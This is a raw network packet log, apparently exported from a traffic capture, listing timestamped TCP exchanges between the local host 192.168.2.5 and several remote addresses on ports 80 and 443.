                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.688705921 CET4434986123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689096928 CET4434986223.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689435959 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689481974 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689518929 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689609051 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689768076 CET49862443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.689788103 CET4434986223.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690151930 CET4434986123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690226078 CET49861443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690619946 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690718889 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690740108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690867901 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690891027 CET4434986223.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.690943956 CET49862443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.691730976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.691843033 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.691849947 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.692409039 CET49861443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.692409039 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.692559958 CET49861443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.692574978 CET4434986123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.693438053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.693495989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.693521023 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.693712950 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694011927 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694120884 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694149971 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694308043 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694430113 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694487095 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694540024 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.694550991 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.695177078 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.695261002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.695337057 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.696307898 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.696454048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.696619987 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.696691990 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.697463989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.697520018 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.697562933 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.697798967 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698266983 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698339939 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698584080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698693991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698698997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.698905945 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699419975 CET49862443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699498892 CET4434986223.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699723005 CET49862443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699739933 CET4434986223.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699740887 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699804068 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699899912 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.699955940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.700871944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.700943947 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.700992107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.701222897 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702044010 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702110052 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702162027 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702179909 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702194929 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.702224970 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.703186035 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.703268051 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.703372002 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.704319954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.704390049 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.704423904 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.705452919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.705478907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.705491066 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.705548048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.706610918 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.706675053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.706804991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.707737923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.707834005 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.707895994 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.708108902 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.708887100 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.709081888 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.709103107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.709470987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.710047007 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.710172892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.710263014 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.711189032 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.711286068 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.711306095 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712332964 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712368965 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712419987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712805033 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712882996 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.712965965 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713012934 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713077068 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713449001 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713531017 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713576078 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.713624001 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.714622021 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.714706898 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.714730978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.715778112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.715873003 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.715935946 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.716892004 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.717000008 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.717067957 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718034983 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718136072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718170881 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718170881 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718286991 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718307972 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718368053 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.718398094 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.719192028 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.719310045 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.719382048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.720330000 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.720416069 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.720484018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.720592976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721541882 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721611023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721636057 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721797943 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721882105 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721894026 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721905947 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721963882 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721976042 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.721987963 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.722023010 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.722064018 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.722594023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.722718954 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.722748995 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.723129034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.723763943 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.723826885 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.723893881 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.724018097 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.724685907 CET49856443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.724921942 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.725013018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.725085020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.725728989 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.726059914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.726099968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.726368904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.727200031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.727293015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.727332115 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.727433920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728395939 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728405952 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728435040 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728462934 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728534937 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728615046 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728943110 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.728976011 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729017019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729182005 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729284048 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729295969 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729533911 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729576111 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729599953 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.729701042 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.730662107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.730739117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.730741024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.730783939 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.731834888 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.731961966 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.731997013 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.732034922 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.732918978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.733025074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.733033895 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.733103991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734090090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734134912 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734189034 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734293938 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734750986 CET4434985923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.734769106 CET4434986023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735179901 CET49859443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735189915 CET4434985923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735212088 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735276937 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735294104 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735338926 CET4434986123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735486031 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735716105 CET4434985923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735805988 CET49860443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.735817909 CET4434986023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736082077 CET49859443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736187935 CET49859443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736192942 CET4434985923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736237049 CET4434986023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736352921 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736442089 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.736529112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737360954 CET49860443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737447023 CET4434986023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737507105 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737633944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737649918 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737732887 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.737849951 CET4434986323.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738615990 CET49860443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738670111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738682032 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738754034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738754034 CET49863443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.738775015 CET4434986323.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.739803076 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.739814997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.740127087 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.740175962 CET49862443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.740266085 CET4434986323.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.740338087 CET49863443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.740978956 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.741102934 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.741264105 CET49861443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.741271973 CET4434986123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.741316080 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742052078 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742101908 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742264986 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742264986 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742805958 CET49863443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.742902994 CET4434986323.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.746037960 CET49863443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.746047020 CET4434986323.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.774363041 CET4434985813.226.94.6192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.774794102 CET49858443192.168.2.513.226.94.6
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.774802923 CET4434985813.226.94.6192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.775965929 CET4434985813.226.94.6192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.776307106 CET49858443192.168.2.513.226.94.6
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.776427031 CET49858443192.168.2.513.226.94.6
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.776438951 CET4434985813.226.94.6192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.776475906 CET4434985813.226.94.6192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.779331923 CET4434986023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.783335924 CET4434985923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.784543991 CET49859443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.784547091 CET49861443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.800416946 CET49863443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.815888882 CET49858443192.168.2.513.226.94.6
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893347979 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893405914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893475056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893475056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893906116 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.893990993 CET4977380192.168.2.5185.215.113.206
